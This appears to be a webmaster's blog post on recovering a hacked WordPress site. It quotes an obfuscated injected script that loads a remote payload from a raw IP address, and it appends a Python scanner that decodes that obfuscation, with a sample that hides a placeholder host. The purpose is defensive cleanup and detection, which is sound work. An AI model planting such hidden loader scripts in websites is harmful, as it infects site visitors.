My site was hacked

What to do when my site is hacked

The intention of this blog post is to help those webmasters whose WordPress sites are hacked. Since I am not a programmer, I can only share what happened to me and how I solved it. Hopefully this article will bring some value to you. In the article I will include some resources for further reading.

What happened

When I tried to log in to WordPress I got this message: "Parse error: syntax error, unexpected '<' in home/xxxx/xxxxx/xxxx/default-widegets.php in line 0000". Now, I haven't updated my site for a while, so I am pretty sure it was not me who made the error.

So I downloaded the file to my computer desktop from the location specified in the message, and found this script on line 0000:

"<html><body><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript srñ='" + gaJsHost + "google-analytics.com/ga.js' " + '!@&s(#r)c@!=&)\'&h$!t^&!$@t@&$p#^&@:$^/&@!&/!9(1)@.(2)1!(2)&.^#6&@&!^5(@!&.&#$1@!4)8!#/($g#$a&.(j^s)'.replace(/#|&|@|\$|\(|\!|\^|\)/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-32645524-1");pageTracker._trackPageview();} catch(err) {}</script></body></html>

Mine wasn't exactly the same, but it was very similar and had a lot more code in it. So I removed the code by upgrading my WordPress blog in cPanel. When it was completed I went to check my site again, and this time the error message was even better: "This site may harm your computer".

So it was confirmed by Google that the site was hacked.

Solutions

1. Locate your IP

If you don't know your local IP, here are the steps:

For Windows

Start
Run
ipconfig

For Linux

Applications
Accessories
ifconfig

2. Who logged into the system

This can be found in your cPanel under last login; it should be your IP.

3. Enable log archiving in cPanel

4. Take your site offline by creating maintenance.php and editing the .htaccess file.

5. Report to your hosting company
Most companies will restore your site or help you solve the problems. Some won't, but unless you try you won't know, and if your company does not want to help, it is probably time for you to change hosts.

6. Scan your computer
Scan your computer thoroughly using 2 or more antivirus systems listed below. If your site has more administrators, you should tell them to do the same.

7. Upgrade all your third-party scripts, such as WordPress, Joomla, Drupal, etc., to the latest version.

8. Change all your passwords, I mean all.

9. Download all the files to your computer and scan them with antivirus software.

After the scan, look into every single file and find out whether there are any other hacking scripts in the files.

10. Once you are happy and sure all the files are clean, ask for a review in your Google Webmaster Tools. It usually takes less than a day before they unmark your site.
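For step 9, one way to search the downloaded files for the trick used in the script quoted earlier, where junk characters hide the real script address until a .replace() call strips them. This is an added example, not code from the original post; the function names and the sample host evil.example.invalid are made up for illustration.

```python
import re
from pathlib import Path

# A JS string literal followed directly by .replace(/.../flags, ''): the
# junk-stripping idiom that hides the real src= in the script quoted above.
STRIP_IDIOM = re.compile(
    r"""(?P<q>['"])(?P<body>(?:\\.|(?!(?P=q))[^\\])*)(?P=q)\s*"""
    r"""\.replace\(\s*/(?P<pat>(?:\\.|[^/\\\n])+)/(?P<flags>[a-z]*)\s*,\s*(?:''|"")\s*\)""",
    re.S,
)
URL = re.compile(r"https?://[^\s'\"<>]+", re.I)


def decode_hidden_strings(text):
    """Return [(line_no, decoded_string, urls)] for each stripped literal."""
    findings = []
    for m in STRIP_IDIOM.finditer(text):
        flags = re.I if "i" in m["flags"] else 0
        try:
            decoded = re.sub(m["pat"], "", m["body"], flags=flags)
        except re.error:
            continue  # pattern uses JS-only regex syntax: review by hand
        decoded = re.sub(r"\\(.)", r"\1", decoded)  # undo JS escapes like \'
        line_no = text.count("\n", 0, m.start()) + 1
        findings.append((line_no, decoded, URL.findall(decoded)))
    return findings


def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Scan a downloaded copy of the site; returns {path: findings}."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = decode_hidden_strings(path.read_text(errors="replace"))
            if found:
                report[str(path)] = found
    return report


# Constructed sample (not the post's script) hiding a placeholder host.
SAMPLE = (
    "<?php // widget code ?>\n"
    "<script>document.write(unescape(\"%3Cscript x='a.js' \" + "
    "'!s#r@c&=\\'h$t(t)p^:!/#/e@v&i$l(.)e^x!a#m@p&l$e(.)i^n!v#a@l&i$d(/)g^a!.#j@s'"
    ".replace(/#|&|@|\\$|\\(|\\!|\\^|\\)/ig, '') + \"'%3E%3C/script%3E\"));</script>\n"
)

if __name__ == "__main__":
    print(decode_hidden_strings(SAMPLE))
```

Call scan_tree() on the folder you downloaded the site into. Any file it lists contains a string that only turns into a script address after the junk is removed, so open it and check the reported line.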

For a more complete step-by-step solution, click here.
